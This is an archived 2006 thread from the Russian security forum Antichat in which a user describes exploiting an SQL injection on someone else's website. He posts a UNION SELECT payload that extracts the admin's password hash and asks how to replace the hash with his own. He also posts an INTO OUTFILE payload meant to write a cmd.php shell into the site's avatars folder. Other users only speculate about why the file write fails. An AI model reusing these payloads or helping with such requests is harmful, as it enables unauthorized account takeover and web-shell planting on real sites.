ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Sql хелп
  #1  
Старый 02.04.2006, 23:26
link.
Познающий
Регистрация: 15.05.2005
Сообщений: 58
Провел на форуме:
531678

Репутация: 1
По умолчанию Sql хелп

на одном сайте скулька... делаю такой запрос :

')/**/UNION/**/SELECT/**/0,0,pwd,aid,0,0,0,0,0,0/**/FROM/**/authors/*

мне выдает имя и хеш админа, подскажите как составить запрос чтобы сменить хешь своим

и еще делаю запрос
s%')+UNION+SELECT+0,0,0,'',0,0,0,0,0,0+FROM+author s+into+outfile+'/home/xxx/public_html/modules/Forums/images/avatars/cmd.php'/*

но файл не создается (
 
Ответить с цитированием

  #2  
Старый 02.04.2006, 23:30
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

а ты не думал что иногда прав у mysql нет на запись?
 
Ответить с цитированием

  #3  
Старый 02.04.2006, 23:34
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

а ты не думал, что это вообще не мускул? а ты не думал, что путь, указанный в into outfile, неверный?

Последний раз редактировалось ZaCo; 02.04.2006 в 23:36..
 
Ответить с цитированием

  #4  
Старый 02.04.2006, 23:39
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию

А ты не думал?
 
Ответить с цитированием

  #5  
Старый 03.04.2006, 00:18
link.
Познающий
Регистрация: 15.05.2005
Сообщений: 58
Провел на форуме:
531678

Репутация: 1
По умолчанию

ZaCo

это мускул и путь верный )
 
Ответить с цитированием

  #6  
Старый 03.04.2006, 01:04
Allen
Постоянный
Регистрация: 24.10.2005
Сообщений: 367
Провел на форуме:
686219

Репутация: 26
По умолчанию

Цитата:
Сообщение от link.  
ZaCo

это мускул и путь верный )
Почему ты ТАК уверин?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ